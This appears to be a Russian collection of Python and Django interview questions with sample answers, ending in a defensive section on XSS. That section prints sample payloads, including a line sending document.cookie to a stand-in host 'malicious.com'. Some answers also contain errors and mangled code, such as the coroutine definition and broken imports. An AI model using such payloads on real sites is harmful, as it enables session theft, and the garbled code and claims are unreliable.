Python | Вопросы собесов

Какую связь использовать для расширения стандартного юзера ? Спросят с вероятностью 7% Для расширения стандартной модели пользователя (User) обычно используется связь "один к одному" (OneToOne). Это позволяет создать дополнительную модель, которая будет связана с моделью пользователя и содержать дополнительные поля и методы, необходимые вашему приложению. Для этого вы можете создать новую модель, которая будет содержать информацию, которую вы хотите добавить к стандартной модели пользователя, и затем создать связь "один к одному" между новой и моделью пользователя.

from django.contrib.auth.models import User
from django.db import 

class UserProfile(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # Дополнительные поля для расширения модели пользователя
    date_of_birth = models.DateField()
    avatar = models.ImageField(upload_to='avatars/')

    # Дополнительные методы и свойства
    def get_full_name(self):
        return f'{self.user.first_name} {self.user.last_name}'

    def str(self):
        return self.user.username

В этом примере UserProfile- это модель, которая расширяет стандартную модель пользователя (User) с дополнительными полями date_of_birthи avatar. Связь OneToOneField указывает на то, что каждый объект UserProfile связан с одним и только одним объектом User. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Чем отличаются классы от миксинов (mixin) ? Спросят с вероятностью 7% Классы и миксины (mixin) - это два различных концепта, но они могут быть взаимосвязаны и использоваться вместе. Вот основные различия: 1️⃣ Классы: - являются основными строительными блоками объектно-ориентированного программирования. - Они определяют поведение и состояние объектов, которые создаются на основе этих классов. - Может быть абстрактным или конкретным, иметь атрибуты, методы, конструкторы и другие спецификации. - Их экземпляры могут быть созданы непосредственно из определенного класса. 2️⃣ Миксины (mixin): - Классы, которые предназначены для повторного использования функциональности в различных классах. - Они обычно содержат методы или атрибуты, которые могут быть включены в другие классы. - Обычно не предназначены для создания экземпляров, они используются для наследования и комбинирования функциональности с другими классами. - Их спользование позволяет избежать дублирования кода и создать гибкие и модульные системы. Основное различие между классами и миксинами заключается в их предназначении и использовании: классы являются основными элементами программирования, в то время как миксины - это инструмент для повторного использования кода и комбинирования функциональности между классами. Иногда множественное наследование и использование миксинов позволяют создавать более гибкие и выразительные программы. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Какие есть паттерны программирования ? Спросят с вероятностью 10% Паттерны программирования - это bewконцептуальные решения типичных проблем, возникающих при разработке ПО. Они представляют собой bewпрактики, которые помогают создавать более эффективные, гибкие и поддерживаемые программы. Вот несколько основных: 1️⃣ Порождающие(Creational Patterns): - Фабричный метод (Factory Method) - Абстрактная фабрика (Abstract Factory) - Строитель (Builder) - Прототип (Prototype) - Одиночка (Singleton) 2️⃣ Структурные(Structural Patterns): - Адаптер (Adapter) - Мост (Bridge) - Компоновщик (Composite) - Декоратор (Decorator) - Фасад (Facade) - Приспособленец (Flyweight) - Заместитель (Proxy) 3️⃣ Поведенческие(Behavioral Patterns): - Цепочка обязанностей (Chain of Responsibility) - Команда (Command) - Итератор (Iterator) - Посредник (Mediator) - Хранитель (Memento) - Наблюдатель (Observer) - Состояние (State) - Стратегия (Strategy) - Шаблонный метод (Template Method) - Посетитель (Visitor) Это только небольшой обзор паттернов. Каждый из них решает определенный типичный набор проблем и может быть применен в соответствующих ситуациях. Использование паттернов программирования помогает создавать более гибкий, поддерживаемый и расширяемый код. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Что можно сказать про два основных типа данных ? Спросят с вероятностью 10% Существует два основных типа данных: изменяемые (mutable) и неизменяемые (immutable) 1️⃣ Изменяемые (mutable): ✅ Изменяемые типы данных могут быть изменены после создания объекта, идентификатор объекта остается неизменным. ✅ Примеры изменяемых типов данных включают: - Списки (list) - Словари (dict) - Множества (set) - Вложенные списки и словари

 my_list = [1, 2, 3]
     my_list.append(4)  # изменяемый тип данных

2️⃣ Неизменяемые (immutable): ✅ Неизменяемые типы данных не могут быть изменены после создания объекта. Если изменяется значение, создается новый объект с новым идентификатором. ✅ Примеры неизменяемых типов данных включают: - Целые числа (int) - Вещественные числа (float) - Комплексные числа (complex) - Строки (str) - Кортежи (tuple)

my_tuple = (1, 2, 3)
     my_tuple[0] = 4  # TypeError: 'tuple' object does not support item assignment

Понимание разницы между изменяемыми и неизменяемыми типами данных важно для эффективного использования их в вашем коде. Часто используются как изменяемые, так и неизменяемые типы данных, и выбор между ними зависит от конкретной задачи и требований к программе. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Что такое querySet() в Django ? Спросят с вероятностью 7% QuerySet - это объект, который представляет набор результатов запроса к базе данных в Django. Он создается при выполнении запроса к модели с использованием менеджера объектов (Object Manager) и представляет собой список объектов, удовлетворяющих условиям запроса. Этот объект предоставляет множество методов для выполнения операций над данными, таких как фильтрация, сортировка, обрезка (slicing), агрегация и другие. Он также лениво вычисляется, что означает, что результаты запроса к базе данных не извлекаются, пока это не потребуется, например, при выполнении итерации по нему или вызове метода, который требует выполнения запроса (например, len() или list()). 1️⃣ Фильтрация объектов:

   # Получить все объекты, у которых поле 'name' равно 'John'
   queryset = MyModel.objects.filter(name='John')

2️⃣ 

Сортировка объектов:

   # Получить все объекты, отсортированные по полю 'date' в порядке убывания
   queryset = MyModel.objects.order_by('-date')

3️⃣ 

Извлечение определенного количества объектов:

   # Получить первые 10 объектов
   queryset = MyModel.objects.all()[:10]

4️⃣ 

Итерация по результатам запроса:

   # Вывести все имена объектов из QuerySet
   queryset = MyModel.objects.all()
   for obj in queryset:
       print(obj.name)

QuerySet предоставляет мощный и гибкий способ работы с данными в Django и является ключевой частью ORM-функционала фреймворка. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Основные сущности в Django ? Спросят с вероятностью 7% Django - это популярный фреймворк для веб-разработки. В нем существует несколько основных сущностей, которые играют важную роль в процессе разработки веб-приложений: 1️⃣ Модели (Models): - Модели представляют собой объекты, которые отображаются на таблицы в базе данных. Каждая модель определяет структуру данных, атрибуты и методы для работы с этими данными. Модели Django используют ORM (Object-Relational Mapping) для взаимодействия с базой данных. 2️⃣ Представления (Views): - Представления - это функции или классы, которые обрабатывают запросы от клиента и возвращают ответы. Они содержат бизнес-логику приложения и используют данные из моделей для генерации контента для клиента. 3️⃣ Шаблоны (Templates): - Шаблоны - это файлы HTML, которые содержат статический контент страницы и динамические данные, предоставляемые представлениями. В шаблонах используется специальный синтаксис Django (шаблонный язык) для вставки данных из контекста представления. 4️⃣ URL-маршруты (URLs): - URL-маршруты определяют соответствие между URL-адресами запросов и функциями представлений, которые должны обрабатывать эти запросы. Они определяются в файле urls.py каждого приложения и могут включать динамические параметры. 5️⃣ Формы (Forms): - Формы Django позволяют работать с данными, отправляемыми пользователем через веб-интерфейс. Они могут быть связаны с моделями для автоматического создания и обновления записей в базе данных, а также включают валидацию данных. 6️⃣ Административный интерфейс (Admin): - Django поставляется с встроенным административным интерфейсом, который автоматически создается на основе определений моделей. Он предоставляет интерфейс для управления данными приложения, включая добавление, редактирование и удаление записей. 7️⃣ Настройки (Settings): - Файл настроек Django (settings.py) содержит все конфигурации проекта, включая параметры базы данных, настройки безопасности, настройки маршрутизации и многое другое. Это основные сущности в Django, которые играют ключевую роль в разработке веб-приложений на этой платформе. С их помощью разработчики могут эффективно создавать, управлять и взаимодействовать с веб-приложениями на его основе. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Что такое корутина ? Спросят с вероятностью 10% Корутина (Coroutine) - это специальный вид функции, который позволяет приостанавливать и возобновлять выполнение в произвольный момент времени. Корутины обеспечивают кооперативную многозадачность, что означает, что они позволяют явно управлять потоком выполнения в своем коде. Основные характеристики: 1️⃣ Асинхронность: Широко используются в асинхронном программировании, таком как асинхронные веб-серверы или сетевые клиенты. Они позволяют выполнять такие операции без блокирования основного потока выполнения. 2️⃣ yield/yield from: Для определения корутины используется ключевое слово yield или yield from, которое указывает места, где выполнение может быть приостановлено и возвращено обратно в вызывающий код. 3️⃣ Возобновление выполнения: Может быть возобновлена, чтобы продолжить выполнение с того же места, где она была приостановлена, и передать ей новые данные. 4️⃣ Сопрограммы: Их также называют сопрограммами (Subroutine), так как они представляют собой подпрограммы, которые могут быть вызваны и возобновлены. Пример:

async def my_coroutine():
    print("Starting coroutine")
    await asyncio.sleep(1)  # Асинхронное ожидание в течение 1 секунды
    print("Coroutine completed")

# Вызов корутины
coro = my_coroutine()

Здесь async def обозначает определение асинхронной функции (корутины). Ключевое слово await используется для ожидания выполнения асинхронной операции, такой как asyncio.sleep(). Когда await используется внутри корутины, выполнение корутины приостанавливается до завершения операции, переданной в await, а затем возобновляется с последующей строки. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Что быстрее, словарь или список ? Спросят с вероятностью 10% Вопрос о том, что быстрее - словарь или список, зависит от конкретной задачи и способа использования этих структур данных. ✅ Если вам нужно осуществлять поиск элементов по ключу, то словарь (тип данных dict) будет быстрее списка (тип данных list). В словаре поиск элемента по ключу выполняется за время, близкое к O(1), в то время как в списке поиск элемента выполняется за время O(n), где n - это количество элементов в списке. ✅ Однако, если вам нужно осуществлять доступ к элементам по индексу или выполнять итерацию по всем элементам в определенном порядке, то список может быть быстрее. В списке доступ к элементу по индексу выполняется за время O(1), в то время как в словаре доступ к элементу по ключу также выполняется за время, близкое к O(1), но требует дополнительных вычислений для хеширования ключа. Выбор между словарем и списком зависит от конкретной задачи и требований к производительности. Если вам нужен быстрый поиск по ключу, используйте словарь. Когда вам нужно хранить элементы в определенном порядке или выполнить доступ к элементам по индексу, используйте список. В некоторых случаях также можно использовать компромисные решения, такие как использование списка кортежей (tuple) или списков словарей (list of dicts), чтобы объединить преимущества обеих структур данных. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Что такое сложность алгоритма ? Спросят с вероятностью 10% Сложность алгоритма - это мера количества ресурсов (таких как время или память), необходимых для выполнения алгоритма в зависимости от размера входных данных. Основной целью изучения сложности алгоритмов является оценка их производительности и эффективности, что позволяет выбрать наиболее подходящий алгоритм для решения конкретных задач. Существует два основных типа сложности алгоритмов: 1️⃣ Временная сложность: Временная сложность определяет количество времени, необходимое для его выполнения в зависимости от размера входных данных. Она измеряется обычно в количестве операций (например, сравнений или обменов) или в единицах времени (например, секундах или миллисекундах). 2️⃣ Пространственная сложность: Пространственная сложность определяет количество памяти, необходимое для его выполнения в зависимости от размера входных данных. Она измеряется обычно в количестве используемых байтов памяти. Важно отметить, что сложность зависит не только от размера входных данных, но и от особенностей самого алгоритма. Например, некоторые алгоритмы могут иметь временную сложность O(n), что означает линейную зависимость времени выполнения от размера входных данных, в то время как другие могут иметь временную сложность O(n^2), что означает квадратичную зависимость времени выполнения. Для оценки сложности алгоритмов обычно используются нотации большого O (O-нотация), Ω (омега-нотация) и Θ (тета-нотация), которые предоставляют верхнюю, нижнюю и точную оценки сложности соответственно. Например, алгоритм с временной сложностью O(n^2) будет иметь квадратичную зависимость времени выполнения от размера входных данных. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🔐 База собесов | 🔐 База тестовых

Эти собесы я хочу забыть. Три года назад я слил мидл-должности в топ-компаниях: Гуглу не ответил, кем буду через 5 лет. В Яндексе не понял шутку про телефонные индексы. В Тинькофф икал, когда спросили о прошлой работе. Теперь мой единственный совет айтишникам: качайте софт-скиллы. Они спасут, даже если HR из ада. Ответы на любые каверзные вопросы — в канале «Выше вилки». А ещё там свыше 50 переговорных стратегий для мидлов, которые гарантируют оффер от ₽300 тыс. Авторы — экс-айтишники Яндекса и Касперского, а также HR из кадрового агентства SpiceIT. За 30 лет суммарного опыта они поняли, как расположить к себе. Теперь бесплатно рассказывают коллегам! Читайте закреп, чтобы офферы сыпались с неба: @above_the_range реклама. рекламодатель ИП Шишков Илья Иванович ИНН: 575206903941 erid: 2Vtzqwza9zW

Что такое XSS. Примеры. Как защитить приложение ? Спросят с вероятностью 3% XSS (Cross-Site Scripting) — это вид атаки на веб-приложения, при котором злоумышленник внедряет вредоносные скрипты в контент веб-страниц, просматриваемых другими пользователями. Эти скрипты выполняются в браузере жертвы от имени веб-приложения, что может привести к краже учетных данных, сессий, изменению веб-страниц и другим безопасностным угрозам. Примеры XSS-атак: 1️⃣ Отраженный XSS (Reflected XSS): Злоумышленник отправляет жертве ссылку с вредоносным кодом в параметрах запроса. Когда жертва переходит по ссылке, вредоносный код отражается от сервера в ответе и выполняется в браузере.

Пример ссылки: http://example.com/search?query=<script>alert('XSS')</script>

2️⃣ Сохраненный XSS (Stored XSS): Вредоносный скрипт сохраняется на сервере (например, в базе данных) и возвращается и выполняется в браузере каждого, кто просматривает зараженный контент. Это может произойти, если злоумышленник добавляет скрипт в комментарии на форуме, который не фильтрует вредоносный код.

Пример комментария: 

<script>alert('XSS')</script>

3️⃣ DOM-based XSS: Этот тип XSS происходит, когда вредоносный скрипт изменяет DOM (структуру документа) веб-страницы с помощью клиентского, не отправляя вредоносный код на сервер. Пример:

document.location.href = 'http://malicious.com/?cookie=' + document.cookie;

Защита от XSS: 1️⃣ Экранирование ввода пользователя: Преобразование специальных символов (например, <, >, &, " и ') в их HTML-энтити (например, <, >, &, " и ') при отображении их на веб-странице. Это предотвращает интерпретацию введенных данных как часть HTML или JavaScript. 2️⃣ Использование Content Security Policy (CSP): Позволяет веб-приложениям указывать, какие источники контента разрешены для загрузки и выполнения, что помогает предотвратить выполнение вредоносных скриптов. 3️⃣ Валидация и санитизация данных: Строгая проверка вводимых данных на соответствие ожидаемому формату и очистка данных от потенциально опасных элементов перед их обработкой или сохранением. 4️⃣ Использование автоматических инструментов защиты: Фреймворки и библиотеки часто предлагают встроенные механизмы для защиты от XSS, такие как автоматическое экранирование вывода. Пример защиты на стороне сервера:

from flask import Flask, request, escape

app = Flask(
name
)

@app.route('/search')
def search():
    query = request.args.get('query', '')
    # Экранирование строки запроса для безопасного отображения
    safe_query = escape(query)
    return f'Результаты поиска для: {safe_query}'

if 
name
 == '
main
':
    app.run()

В этом примере, используя функцию escape из Flask, мы экранируем пользовательский ввод, чтобы предотвратить выполнение вредоносного кода, который мог бы быть встроен в запрос. XSS — это серьезная угроза безопасности веб-приложений, позволяющая злоумышленникам выполнять вредоносные скрипты в браузерах пользователей. Для защиты от XSS необходимо экранировать ввод пользователя, использовать CSP, проводить валидацию и санитизацию данных, а также применять встроенные средства защиты веб-фреймворков. XSS — это когда плохие люди вставляют в сайты вредоносные программы, чтобы украсть ваши данные или сделать что-то плохое. Защититься можно, делая специальные проверки данных, которые люди вводят на сайт, и не позволяя этим программам запускаться. 👉 Можно посмотреть Примеры как отвечают люди на этот вопрос, или перейти К списку 1096 вопроса на Python разработчика. Ставь 👍 если нравится контент 🧩 Идущий | 🔐 Собесы | 🔐 Тестовые